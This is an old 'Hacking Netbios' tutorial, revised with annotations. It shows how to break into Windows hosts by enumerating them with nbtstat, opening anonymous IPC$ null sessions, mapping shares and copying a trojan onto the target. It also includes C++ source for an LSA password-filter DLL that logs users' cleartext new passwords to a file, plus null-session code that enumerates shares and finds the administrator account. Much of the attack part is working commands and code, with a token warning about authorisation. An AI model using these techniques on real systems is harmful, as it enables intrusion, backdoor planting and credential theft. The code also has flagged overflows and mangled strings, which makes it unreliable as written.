Screech

Hacking Netbios


Well..first of all hello folks..

In this tutorial I want to show you how to get into a Windows host over NetBIOS/SMB (null sessions and open shares). Only do this against systems you are authorised to test.

And here is what u need:

- Windows ( for the method I'll explain here )

- Internet ;)

- the results of a NetBIOS scan (see the X-Scan / port-scan section below)

- a command prompt (cmd.exe)

- some familiarity with the command line and with nbtstat.exe and net.exe (Microsoft TechNet has the reference)

- knowledge about trojans or backdoors ( how they work...)

************************************************************************************

Lets start...

1. Open a command prompt.

2. Run `nbtstat -A IP` (capital -A takes an IP address; lowercase -a takes a machine name).

( IP is the address of the remote PC, taken from your scan results. )

If the host answers NetBIOS name queries (UDP 137) you get a name table like the one below. The entry to look for is `<20>`: it means the Server (file-sharing) service is registered, so there is an SMB service to connect to. Without it the rest of this tutorial has nothing to talk to:

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------

computername <00> UNIQUE Registered

workgroupname <00> GROUP Registered

computername <20> UNIQUE Registered

workgroupname <1E> GROUP Registered

workgroupname <1D> UNIQUE Registered

..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers )

************************************************************************************

You can find NetBIOS hosts with X-Scan. Also run a port scanner such as SuperScan

(available at www.packetstormsecurity.nl): open ports 135–139 indicate NetBIOS services, and 445 indicates SMB directly over TCP (Windows 2000 and later).

Sample X-Scan output (account details it pulls over the anonymous session):

xxx.xxx.xxx.xxx

Administrator - [built-in account for administering the computer/domain]

Account type: Administrator

Password age: 291 Day 10 Hour 28 Minute 34 Sec.

Bad password count: 0 / Number of logons: 9

Last logon: GMT Wed Aug 14 15:26:38 2002

Guest - [built-in account for guest access to the computer/domain]

Account type: Guest

Password age: 0 Day 0 Hour 0 Minute 0 Sec.

Bad password count: 0 / Number of logons: 0

************************************************************************************

3. Now enter this in the command prompt

( replace xxx.xxx.xxx.xxx with the target's IP; `C:\>` is the prompt, don't type it ):

C:\> net view \\xxx.xxx.xxx.xxx

Response (possible):

System error 5 has occurred.

Access denied.

c:

Oops... not as easy as we thought. Try this instead:

C:\> net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""   ( this opens a null session: an anonymous connection to the hidden IPC$ share with an empty user name and password. Windows XP SP2 / Server 2003 and later restrict what an anonymous session may do, and often whether it connects at all, so on a patched host expect this step to fail — and if it fails, nothing below applies. )

Response: The command completed successfully.

Ok..lets test it again...

C:\> net view \\xxx.xxx.xxx.xxx

Response: Shared resources at \\xxx.xxx.xxx.xxx

* Here it displays the resources

mkay...now we know the shared resources

Now map a drive letter to one of the shared folders:

C:\> net use m: \\xxx.xxx.xxx.xxx\folder   ( replace "folder" with the name of a share from the list )

Response: The command completed successfully.

Now switch to the new drive:

C:\> m:

..usually nothing interesting in a shared folder. And because of that...

4. A shared folder by itself rarely gives you much, so the next step in this tutorial is to place a backdoor on the host. A purpose-written one is less likely to be caught by AV tools than a well-known one such as BO2k — but either way, keep in mind that a writable share only lets you put a file on disk; nothing on the target executes it for you.

Upload the file:

m:\> copy C:\path_to_the_trojan_here m:\

The file is now on the target's disk — it is not running. Getting it executed is a separate problem this tutorial does not solve. The author's further suggestion is to later use that backdoor to drop a DLL-based one that replaces an existing *.dll.

5. Finally, disconnect the mapped drive:

C:\> net use m: /DELETE

******************************************************************************************

******************************************************************************************

********************** C++ source for the above, to save time ****************************

******************************************************************************************

******************************************************************************************

********************* You will probably have to edit it in several places ***********************

******************************************************************************************

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>



/*
 * Local mirror of the counted Unicode string the LSA hands to a password
 * filter. len is a BYTE count (PasswordChangeNotify divides it by
 * sizeof(WCHAR)) and buff is not NUL-terminated: the callbacks below copy
 * the text out and terminate it themselves.
 */
struct UNI_STRING {

USHORT len;      /* length in bytes, no terminator included */

USHORT maxlen;   /* presumably capacity in bytes; not used below */

WCHAR *buff;     /* not NUL-terminated */

};



/* Log file handle shared by both callbacks: opened by InitializeChangeNotify,
 * written by PasswordChangeNotify, never closed. */
static HANDLE fh;



/*
 * Password-filter entry point with the export name the LSA calls once when
 * it loads a registered notification DLL. Opens the log file that
 * PasswordChangeNotify appends to and always reports success.
 *
 * Review notes (left as-is; runtime strings are not touched here):
 *  - Both string literals lost their backslashes in extraction: the path is
 *    meant to read "C:\\WINNT\\temp\\pwdchange.tmp" and the message to end
 *    in "\n".
 *  - fh is never compared against INVALID_HANDLE_VALUE; if CreateFile fails
 *    every later WriteFile fails silently and the filter still returns TRUE.
 *  - The hard-coded 31 is shorter than the message, so the tail is dropped;
 *    strlen() of the literal is what was intended.
 *  - FILE_SHARE_READ|FILE_SHARE_WRITE lets any process that can open the
 *    path read the cleartext passwords while LSASS holds the file open.
 */
BOOLEAN __stdcall InitializeChangeNotify ()

{

DWORD wrote;

fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE,

FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,

0);

/* 31 bytes is fewer than the literal holds; see the note above. */
WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0);

return TRUE;

}



/*
 * Password-filter callback the LSA invokes after a password change, with the
 * account name, its RID and the NEW password in cleartext. Appends
 * "User = <name> : p4sswd = <password> : RID = <hex>" to the file opened by
 * InitializeChangeNotify. Returning 0 tells the LSA the notification was
 * handled. This is a credential-capture hook running inside LSASS.
 *
 * Defects a reviewer would flag (not fixed here):
 *  - memcpy copies user->len / passwd->len bytes into wbuf (400 bytes) with
 *    no bound, and wbuf[len] then writes at index len; len is derived from a
 *    16-bit byte count, so any name or password longer than 199 WCHARs
 *    overruns the stack — in LSASS.
 *  - wcstombs(buf1, wbuf, 199) leaves buf1 unterminated when the conversion
 *    fills all 199 bytes; the sprintf that follows then reads past it.
 *  - "RID = %xn" is "RID = %x\n" with the backslash lost in extraction.
 *  - Every WriteFile goes to the global fh without checking it was opened.
 */
LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,

struct UNI_STRING *passwd)

{

DWORD wrote;

WCHAR wbuf[200];

char buf[512];

char buf1[200];

DWORD len;



/* Unbounded copy: user->len is a byte count, wbuf holds 400 bytes. */
memcpy(wbuf, user->buff, user->len);

len = user->len/sizeof(WCHAR);

wbuf[len] = 0;   /* out of bounds once len >= 200 */

wcstombs(buf1, wbuf, 199);   /* may leave buf1 unterminated */

sprintf(buf, "User = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



/* Same unbounded copy for the new password. */
memcpy(wbuf, passwd->buff, passwd->len);

len = passwd->len/sizeof(WCHAR);

wbuf[len] = 0;

wcstombs(buf1, wbuf, 199);

sprintf(buf, "p4sswd = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



/* Literal should end in "\n"; the backslash was lost in extraction. */
sprintf(buf, "RID = %xn", rid);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



return 0L;

}





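// Open a null (anonymous) session to \\TargetHost\IPC$ and, if that works,
// list the host's shares and user accounts under a new root in
// pDlg->m_Victims.
//
// TargetHost  host name or dotted IP, with or without a leading "\\".
// pDlg        dialog whose m_Victims tree control receives the results.
// Returns TRUE when the anonymous IPC$ connection was accepted (the
// enumeration results, if any, are in the tree); FALSE otherwise with
// GetLastError() set to the failing NET_API_STATUS or
// ERROR_INVALID_COMPUTERNAME.
//
// Changes against the listing as posted: backslashes lost in extraction are
// restored (L'\\', L'\0', "\\IPC$"); the SHARE_INFO_1 buffer is walked by
// index and released with NetApiBufferFree instead of being leaked through
// pointer bumps; enumeration only runs when the session was actually
// established (the listing used an uninitialised machineRoot otherwise);
// the Users/Admin nodes exist before DoNetUserEnum runs even when the host
// exposes no shares; and the function reports success instead of always
// returning FALSE.
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
{
    // Read the CString through its LPCTSTR conversion; the original used
    // GetBuffer() and skipped ReleaseBuffer() on every early return.
    const char* pTemp = (LPCSTR)TargetHost;
    WCHAR wszServ[256];
    if (MultiByteToWideChar(CP_ACP, 0, pTemp, -1, wszServ,
                            sizeof(wszServ) / sizeof(wszServ[0])) == 0)
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }
    LPWSTR Server = wszServ;

    if (*Server == L'\0')
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    // Build "\\server\IPC$"; accept both "server" and "\\server" as input.
    WCHAR RemoteResource[UNCLEN + 5 + 1];
    DWORD dwServNameLen = lstrlenW(Server);
    if (Server[0] == L'\\' && Server[1] == L'\\')
    {
        dwServNameLen -= 2;             // prefix already present
        RemoteResource[0] = L'\0';
    }
    else
    {
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    if (dwServNameLen > CNLEN)
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }
    if (lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if (lstrcatW(RemoteResource, L"\\IPC$") == NULL) return FALSE;

    // Null session: empty user, password and domain.
    USE_INFO_2 ui2;
    ZeroMemory(&ui2, sizeof(ui2));
    ui2.ui2_local      = NULL;
    ui2.ui2_remote     = (LPTSTR)RemoteResource;
    ui2.ui2_asg_type   = USE_IPC;
    ui2.ui2_password   = (LPTSTR)L"";
    ui2.ui2_username   = (LPTSTR)L"";
    ui2.ui2_domainname = (LPTSTR)L"";

    NET_API_STATUS nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    if (nas != NERR_Success)
    {
        // Anonymous IPC$ refused (e.g. RestrictAnonymous): nothing to enumerate.
        SetLastError(nas);
        return FALSE;
    }

    HTREEITEM machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);
    HTREEITEM shareRoot = NULL;
    HTREEITEM userRoot  = pDlg->m_Victims.InsertItem("Users", machineRoot, TVI_LAST);
    HTREEITEM adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot, TVI_LAST);

    // Shares. MAX_PREFERRED_LENGTH asks for everything in one buffer, so
    // dwEntriesRead is the count actually present in pSHInfo1.
    SHARE_INFO_1* pSHInfo1 = NULL;
    DWORD dwEntriesRead = 0;
    DWORD dwTotalEntries = 0;
    nas = NetShareEnum(Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH,
                       &dwEntriesRead, &dwTotalEntries, NULL);
    if (nas == NERR_Success && dwEntriesRead > 0)
    {
        shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot, TVI_LAST);
        for (DWORD x = 0; x < dwEntriesRead; x++)
        {
            char sharename[256];
            char remark[256];
            WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pSHInfo1[x].shi1_netname, -1,
                                sharename, sizeof(sharename), NULL, NULL);
            WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pSHInfo1[x].shi1_remark, -1,
                                remark, sizeof(remark), NULL, NULL);
            CString ShareDetails = sharename;
            ShareDetails = ShareDetails + " - " + remark;
            pDlg->m_Victims.InsertItem(ShareDetails, shareRoot, TVI_LAST);
        }
    }
    if (pSHInfo1 != NULL)
        NetApiBufferFree(pSHInfo1);     // the listing advanced the pointer and leaked it

    // Users and the RID-500 account, over the same session.
    DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

    // Drop the IPC$ connection; its status is exposed via GetLastError().
    nas = NetUseDel(NULL, (LPTSTR)RemoteResource, 0);
    SetLastError(nas);
    return TRUE;
}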







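// Report whether pUser on pServer is the built-in Administrator account
// (relative ID 500), whatever it has been renamed to.
//
// pServer  host name (with or without "\\") or NULL for the local machine.
// pUser    account name to look up.
// Name     receives "Admin is DOMAIN\user\n" when the account is RID 500;
//          untouched otherwise.
// Returns true when the SID's last sub-authority is 500.
//
// Changes against the listing as posted: LookupAccountName's result is
// checked before the SID is dereferenced (a failed lookup used to read
// through a NULL PSID); the malloc'd SID is released with free(), not
// delete; szDomainName, which the listing never declared, is a local
// buffer; and the format string's backslash and line break, lost in
// extraction, are restored.
bool GetAdmin(char* pServer, char* pUser, CString& Name)
{
    char szDomainName[256];
    DWORD dwDomainName = sizeof(szDomainName);
    DWORD dwSize = 0;
    SID_NAME_USE use;
    bool bFoundHim = false;

    // First call only sizes the SID; ERROR_INSUFFICIENT_BUFFER is the
    // expected outcome. Anything else means the account does not resolve.
    LookupAccountName(pServer, pUser, NULL, &dwSize, szDomainName,
                      &dwDomainName, &use);
    if (GetLastError() != ERROR_INSUFFICIENT_BUFFER || dwSize == 0)
        return false;

    PSID pUserSID = (PSID)malloc(dwSize);
    if (pUserSID == NULL)
        return false;

    dwDomainName = sizeof(szDomainName);
    if (LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName,
                          &dwDomainName, &use))
    {
        // The RID is the last sub-authority; 500 is the built-in Administrator.
        UCHAR subCount = *GetSidSubAuthorityCount(pUserSID);
        if (subCount > 0 && *GetSidSubAuthority(pUserSID, subCount - 1) == 500)
        {
            Name.Format("Admin is %s\\%s\n", szDomainName, pUser);
            bFoundHim = true;
        }
    }

    free(pUserSID);
    return bFoundHim;
}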







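// Enumerate the user accounts on pServer over the session the caller has
// already established, adding each name under userRoot; the first account
// GetAdmin identifies as RID 500 is also listed under adminRoot.
//
// pServer    wide host name, with or without a leading "\\".
// pDlg       dialog whose m_Victims tree control receives the entries.
// userRoot   tree node under which every user name is inserted.
// adminRoot  tree node under which the RID-500 account is inserted.
//
// Changes against the listing as posted: RemoteResource, dwServNameLen and
// GotAdmin are declared here (they were used without any declaration); the
// backslashes lost from the L'' literals are restored; the missing ')' on
// the GotAdmin test is fixed; the server-name conversion is hoisted out of
// the per-user loop; and the enumeration buffer is released on every exit.
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)
{
    WCHAR RemoteResource[UNCLEN + 1];
    DWORD dwServNameLen = lstrlenW(pServer);
    bool GotAdmin = false;

    // NetUserEnum wants "\\server"; add the prefix only if it is missing.
    if (pServer[0] == L'\\' && pServer[1] == L'\\')
    {
        dwServNameLen -= 2;
        RemoteResource[0] = L'\0';
    }
    else
    {
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    if (dwServNameLen > CNLEN)
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return;
    }
    if (lstrcatW(RemoteResource, pServer) == NULL) return;

    // Narrow copy of the server name for GetAdmin; the same for every user.
    char userServer[256];
    WideCharToMultiByte(CP_ACP, 0, pServer, -1, userServer, sizeof(userServer), NULL, NULL);

    DWORD dwRC;
    DWORD dwResume = 0;
    do
    {
        USER_INFO_10* pUserbuf = NULL;
        DWORD dwRead = 0;
        DWORD dwRemaining = 0;
        // 1024-byte preferred length, so large account lists come back in
        // several ERROR_MORE_DATA rounds keyed by dwResume.
        dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**)&pUserbuf, 1024,
                           &dwRead, &dwRemaining, &dwResume);
        if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)
        {
            if (pUserbuf != NULL)
                NetApiBufferFree(pUserbuf);
            break;
        }

        USER_INFO_10* pCurUser = pUserbuf;
        for (DWORD i = 0; i < dwRead; ++i, ++pCurUser)
        {
            char userName[256];
            WideCharToMultiByte(CP_ACP, 0, pCurUser->usri10_name, -1,
                                userName, sizeof(userName), NULL, NULL);

            // Only one account can carry RID 500; stop checking once found.
            if (!GotAdmin)
            {
                CString Admin;
                GotAdmin = GetAdmin(userServer, userName, Admin);
                if (GotAdmin)
                {
                    Admin.TrimRight();
                    HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);
                    pDlg->m_Victims.EnsureVisible(adminChild);
                }
            }

            CString strUserName = userName;
            pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);
        }

        if (pUserbuf != NULL)
            NetApiBufferFree(pUserbuf);
    } while (dwRC == ERROR_MORE_DATA);

    if (dwRC != ERROR_SUCCESS)
        printf("NUE() returned %lu\n", dwRC);
}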

***************************************************************************************

Some NetBios hacking tools:

DumpSec

http://www.somarsoft.com

Windows NT/2000

Legion

http://www.technotronic.com

Windows 9x/NT/2000, UNIX/Linux

NAT

http://www.packetstormsecurity.nl

Windows 9x/NT, UNIX/Linux

****************************************************************************************

Congratulations — you're in. From here you can also reach the host over FTP, if it runs an FTP server.
